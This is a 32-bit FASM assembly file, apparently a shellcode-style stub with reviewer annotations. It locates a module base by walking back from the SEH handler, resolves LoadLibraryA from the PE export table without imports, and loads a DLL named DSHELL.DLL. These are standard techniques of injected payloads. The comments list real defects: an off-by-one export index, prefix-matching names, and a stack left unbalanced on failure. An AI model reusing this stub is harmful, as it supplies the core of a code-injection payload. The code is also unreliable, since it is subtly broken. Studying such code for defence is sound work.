include "D:/tools/fasm/include/win32a.inc"
use32
; Entry stub (FASM, use32, flat position-independent code, no data section).
; Locates a module base by walking back from the current SEH handler, then
; resolves LoadLibraryA from that module's export table and calls it.
; Only edi/esi are saved; ebx, ecx and edx are overwritten without being
; saved, so a caller relying on the Win32 callee-saved set loses ebx here.
push edi
push esi
; find KERNEL32 base address using info from SEH
; fs:[0] = TIB.ExceptionList (head of the SEH chain); +4 = that record's
; Handler field.  NOTE(review): nothing below checks WHICH module contains
; that handler beyond the MZ/PE signatures - the "KERNEL32" assumption is
; not verified by this code; confirm for the target environment.
mov eax, [fs:0]
mov eax, [eax+4]
and eax, 0xFFFFF000                 ; page-align the handler address
@@:
; Step back one page at a time until a page starts with "MZ".
; There is no lower bound and no SEH frame of its own: if no "MZ" is found
; before an unmapped page, the read at [eax] faults.
sub eax, 0x1000
cmp word [eax], 0x5A4D ; "MZ"
je found_some_base
jmp @b
found_some_base:
; edx = base + e_lfanew (IMAGE_DOS_HEADER+0x3C) -> expected NT headers
mov edx, eax
add edx, [eax+0x3C]
cmp dword [edx], 0x00004550 ; "PE\0\0"
je found_some_peheader
jmp exit                            ; not a PE image: give up, no retry
found_some_peheader:
; now eax contains base address of KERNEL32
; and edx contains address of PE header
mov ebx, eax                        ; ebx = module base, as get_proc_addr expects
; "call @f" pushes the address of the string that follows as the return
; address; "pop edi" turns it into a position-independent string pointer.
call @f
db "LoadLibraryA",0
@@: pop edi
call get_proc_addr                  ; eax = resolved address (see notes on get_proc_addr)
; Same trick, but the pushed "return address" is left on the stack: it is
; the single stdcall argument for the call through eax.
call @f
db "DSHELL.DLL",0
@@: call eax                        ; LoadLibraryA("DSHELL.DLL"); its eax is what the stub returns
exit:
pop esi
pop edi
ret
; get_proc_addr
; Resolve an export by name by walking the PE32 export directory of the
; module whose base is in ebx.  Name indexes are walked from the high end
; downward and the first equal name wins.
; in edi: char* lpszFuncName
; in edx: PEHEADER*
; in ebx: HANDLE hModule
; out eax: void* lpFuncAddress
; Clobbers: ecx, edx, esi, flags.  edi is restored; ebx is not written.
; Limitations visible in the code below:
;  - eax starts at NumberOfNames, so the first compare reads one entry past
;    the end of the name/ordinal arrays and index 0 is never compared
;    (off by one);
;  - the terminator is never compared: an export whose name is a proper
;    prefix of lpszFuncName also counts as a match;
;  - the not-found path returns with the export-directory pointer still
;    pushed, so its "ret" pops that pointer as the return address;
;  - forwarded exports are not detected; the table RVA is returned as-is.
get_proc_addr:
mov edx, [edx+0x78] ; RVA of Export table
add edx, ebx                        ; edx = IMAGE_EXPORT_DIRECTORY (VA)
push edx                            ; kept for the ordinal/function lookups below
mov eax, [edx+0x18] ; number of names
mov edx, [edx+0x20] ; RVA of arrayOfNames
add edx, ebx                        ; edx = AddressOfNames (VA)
cld                                 ; cmpsb must walk forward
get_proc_addr__loop:
; eax = current name index; esi = VA of that export's name string
mov esi, [edx+eax*4]
add esi, ebx
push edi                            ; cmpsb advances edi; keep the caller's pointer
strcmp__loop:
cmpsb                               ; compare [esi] with [edi], advance both
jne strcmp__ne
cmp byte [esi], 0                   ; end of the export name => treated as a match
jne strcmp__loop
get_proc_addr__name_found:
pop edi
pop edx                             ; edx = export directory again
mov ecx, [edx+0x24] ; ords table
add ecx, ebx
movzx ecx, word [ecx+eax*2]         ; ecx = zero-based index into the functions table
; sub eax, [edx+0x10] ; index in funcs table = K - base
; (kept disabled: AddressOfNameOrdinals already holds zero-based indices)
mov eax, [edx+0x1C]
add eax, ebx ; funcs table
mov eax, [eax+ecx*4]                ; RVA of the function
add eax, ebx ; function address
ret
strcmp__ne:
pop edi                             ; restore lpszFuncName for the next candidate
dec eax
test eax, eax
jnz get_proc_addr__loop
ret                                 ; not found: eax = 0, but the pushed edx is still on the stack
end_of_file: